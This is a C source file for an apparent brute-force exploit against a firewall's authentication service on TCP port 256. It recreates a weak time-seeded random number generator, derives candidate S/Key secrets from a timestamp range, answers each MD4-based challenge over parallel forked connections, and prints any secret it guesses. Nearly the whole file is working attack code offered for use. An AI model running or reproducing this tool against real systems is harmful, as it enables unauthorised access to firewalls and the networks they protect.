#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>

#include "global.h"
#include "md4.h"

#define FWD_PORT 256
#define FWD_INIT 0x31000000
#define FWD_OPCODE 0x0000000c

// #define DEBUG

#define NOKIA

#if defined(NOKIA)
static unsigned long rseed;

void my_srand(unsigned long seed)
{
  rseed = seed;
}

unsigned long my_rand(void)
{
  rseed *= 1103515245;
  rseed += 12345;

  return rseed & (unsigned long)0x7fffffff;
}
#else
#error Chose a random number generator!
#endif

#if defined(DEBUG)
void hex_dump(char *header, char *buff, int len)
{
  int i, k;

  printf("**** %s ****\n", header);

  for (i = 0; i < len; i += 16) {
    printf("%04x: ", i);
    for (k = 0; k < 16 && i + k < len; k++)
      printf("%02x ", (unsigned char)buff[i + k]);
    while (k++ < 16)
      printf("   ");
    for (k = 0; k < 16 && i + k < len; k++)
      if (buff[i + k] >= 32 && buff[i + k] <= 126)
	printf("%c", buff[i + k]);
      else
	printf(".");
    printf("\n");
  }
}
#endif

int full_read(int s, char *buff, int len)
{
  int res;
#if defined(DEBUG)
  char *orig_buff = buff;
  int orig_len = len;
#endif

  while (len > 0)
    if ((res = read(s, buff, len)) <= 0) {
      fprintf(stderr, "Cannot read from socket\n");
      return -1;
    } else {
      buff += res;
      len -= res;
    }

#if defined(DEBUG)
  hex_dump("READ", orig_buff, orig_len);
#endif

  return 0;
}
    
int full_write(int s, char *buff, int len)
{
  int res;
#if defined(DEBUG)
  char *orig_buff = buff;
  int orig_len = len;
#endif

  while (len > 0)
    if ((res = write(s, buff, len)) <= 0) {
      fprintf(stderr, "Cannot write to socket\n");
      return -1;
    } else {
      buff += res;
      len -= res;
    }

#if defined(DEBUG)
  hex_dump("WRITE", orig_buff, orig_len);
#endif

  return 0;
}

int write_long(int s, unsigned long data)
{
  data = htonl(data);
  return full_write(s, (char *)&data, sizeof (data));
}

int write_addr(int s, unsigned long addr)
{
  return full_write(s, (char *)&addr, sizeof (addr));
}

int read_long(int s, unsigned long *data)
{
  if (full_read(s, (char *)data, sizeof (*data)) < 0)
    return -1;

  *data = ntohl(*data);
  return 0;
}

int read_addr(int s, unsigned long *addr)
{
  return full_read(s, (char *)addr, sizeof (*addr));
}

char *asc_addr(unsigned long addr)
{
  static int idx = 0;
  char *res;
  static char buff[4][16];
  unsigned char *asc = (unsigned char *)&addr;

  res = buff[idx++];
  idx &= 3;

  sprintf(res, "%d.%d.%d.%d", asc[0], asc[1], asc[2], asc[3]);
  return res;
}

void seed_to_key(unsigned long seed, char *buff)
{
  static char *map = "abcdefghigklmnopqrstuvwxyz0123456789_";
  int i;

  my_srand(seed);

  for (i = 0; i < 8; i++)
    buff[i] = map[my_rand() % 37];

  buff[i] = 0;
}

void create_pw(int iter, char *addr, char *secret, char *buff)
{
  MD4_CTX ctx;
  unsigned char digest[16];
  int i, k;

#if defined(DEBUG)
  printf("Secret key = '%s', address = '%s', iterations = %d\n",
	 secret, addr, iter);
#endif
  
  MD4Init(&ctx);
  MD4Update(&ctx, addr, strlen(addr));
  MD4Update(&ctx, secret, strlen(secret));
  MD4Final(digest, &ctx);

  for (i = 0; i < 8; i++)
    digest[i] = digest[i] ^ digest[i + 8];

  for (k = 0; k < iter; k++) {
    MD4Init(&ctx);
    MD4Update(&ctx, digest, 8);
    MD4Final(digest, &ctx);

    for (i = 0; i < 8; i++)
      digest[i] = digest[i] ^ digest[i + 8];
  }

  for (i = 0; i < 8; i++)
    sprintf(&buff[i << 1], "%02x", digest[i]);

#if defined(DEBUG)
  printf("Password = '%s'\n", buff);
#endif
}

unsigned long make_time(char *spec)
{
  struct tm tconv;
  char buff4[5], buff2[3];
  unsigned long res;

  if (strlen(spec) != 14)
    return 0;

  buff4[4] = 0;
  buff2[2] = 0;

  memset(&tconv, 0, sizeof (tconv));

  strncpy(buff4, spec, 4);
  tconv.tm_year = atoi(buff4) - 1900;
  strncpy(buff2, spec + 4, 2);
  tconv.tm_mon = atoi(buff2) - 1;
  strncpy(buff2, spec + 6, 2);
  tconv.tm_mday = atoi(buff2);
  strncpy(buff2, spec + 8, 2);
  tconv.tm_hour = atoi(buff2);
  strncpy(buff2, spec + 10, 2);
  tconv.tm_min = atoi(buff2);
  strncpy(buff2, spec + 12, 2);
  tconv.tm_sec = atoi(buff2);

  if ((res = mktime(&tconv)) == (unsigned long)-1)
    return 0;

#if defined(DEBUG)
  printf("Time conversion: %s -> %ld\n", spec, res);
#endif

  return res;
}

void usage(char *name)
{
  fprintf(stderr, "Usage: %s fw-address peer-address\n", name);
  fprintf(stderr, "       YYYYMMDDHHMMSS YYYYMMDDHHMMSS\n");
  fprintf(stderr, "       processes\n");
}

int main(int ac, char *av[])
{
  int s, i;
  int pid;
  unsigned char string_data[256];
  char key[9];
  unsigned long long_data;
  unsigned long peer_addr, serv_addr;
  struct protoent *prot;
  struct sockaddr_in addr;
  unsigned long time1, time2, aux_time;
  unsigned long proc_num, num_proc;
  int stat;

  if (ac != 6) {
    usage(av[0]);
    return 1;
  }

  if ((peer_addr = inet_addr(av[2])) == (unsigned long)-1) {
    fprintf(stderr, "Invalid peer address specified\n");
    return 1;
  }

  if ((time1 = make_time(av[3])) == 0) {
    fprintf(stderr, "Invalid time specification: %s\n", av[3]);
    return 1;
  }

  if ((time2 = make_time(av[4])) == 0) {
    fprintf(stderr, "Invalid time specification: %s\n", av[4]);
    return 1;
  }

  if (time2 < time1) {
    aux_time = time1;
    time1 = time2;
    time2 = aux_time;
  }

  if ((num_proc = atoi(av[5])) < 1) {
    fprintf(stderr, "Invalid number of processes specified\n");
    return 1;
  }

  if ((prot = getprotobyname("tcp")) == NULL) {
    fprintf(stderr, "Cannot get protocol number for TCP\n");
    return 2;
  }

  for (proc_num = 0; proc_num < num_proc; proc_num++) {

    if ((pid = fork()) < 0) {
      perror("Cannot fork");
      return 2;
    }

    if (pid != 0)
      continue;

    for (aux_time = time1 + proc_num; aux_time <= time2;
	 aux_time += num_proc) {

      if ((s = socket(PF_INET, SOCK_STREAM, prot->p_proto)) < 0) {
	perror("Cannot create socket");
	return 2;
      }

      memset(&addr, 0, sizeof (addr));
      addr.sin_family = PF_INET;
      addr.sin_port = htons(FWD_PORT);

      if ((addr.sin_addr.s_addr = inet_addr(av[1])) == (unsigned long)-1) {
	fprintf(stderr, "Invalid firewall address specified\n");
	close(s);
	return 1;
      }

      if (connect(s, &addr, sizeof (addr)) < 0) {
	perror("Cannot connect socket");
	close(s);
	return 2;
      }

      if (write_long(s, FWD_INIT) < 0) {
	close(s);
	return 3;
      }

      if (write_long(s, FWD_OPCODE) < 0) {
	close(s);
	return 3;
      }

      if (write_long(s, sizeof (peer_addr)) < 0) {
	close(s);
	return 3;
      }

      if (write_addr(s, peer_addr) < 0) {
	close(s);
	return 3;
      }

      if (read_long(s, &long_data) < 0) {
	close(s);
	return 3;
      }

#if defined(DEBUG)
      printf("Server version: %.8lx\n", long_data);
#endif

      if (read_long(s, &long_data) < 0) {
	close(s);
	return 3;
      }

      for (i = 0; i < long_data / sizeof (serv_addr); i++) {
	if (read_addr(s, &serv_addr) < 0) {
	  close(s);
	  return 3;
	}
#if defined(DEBUG)
	printf("IP address #%d: %s\n", i + 1, asc_addr(serv_addr));
#endif
      }

      if (read_long(s, &long_data) < 0) {
	close(s);
	return 3;
      }

      if (long_data > sizeof (string_data)) {
	fprintf(stderr, "String is too long (%ld bytes)\n", long_data);
	return 3;
      }

      if (full_read(s, string_data, long_data) < 0) {
	close(s);
	return 3;
      }

      if (strcmp("skey", string_data)) {
	fprintf(stderr,
		"Unsupported authentication method: '%s'\n", string_data);
	close(s);
	return 3;
      }
      
      if (read_long(s, &long_data) < 0) {
	close(s);
	return 3;
      }

      if (long_data == 0) {
	fprintf(stderr, "Peer does not know us (challenge = 0)\n");
	close(s);
	return 3;
      }

#if defined(DEBUG)
      printf("Challenge is %ld\n", long_data);
#endif

      seed_to_key(aux_time, key);
      printf("\r%s", key);
      fflush(stdout);
      create_pw(long_data, av[2], key, string_data);

      long_data = strlen(string_data) + 1;
      if (write_long(s, long_data) < 0) {
	close(s);
	return 3;
      }

      if (full_write(s, string_data, long_data) < 0) {
	close(s);
	return 3;
      }

      if (write_long(s, 0) < 0) {
	close(s);
	return 3;
      }

      if (read_long(s, &long_data) < 0) {
	close(s);
	return 3;
      }

      if (long_data == 1)
	printf("\nGUESSED SECRET: %s\n", key);

      close(s);
    }

    return 0;
  }

  for (proc_num = 0; proc_num < num_proc; proc_num++)
    wait3(&stat, 0, NULL);
  
  printf("\r        \r");

  return 0;
}
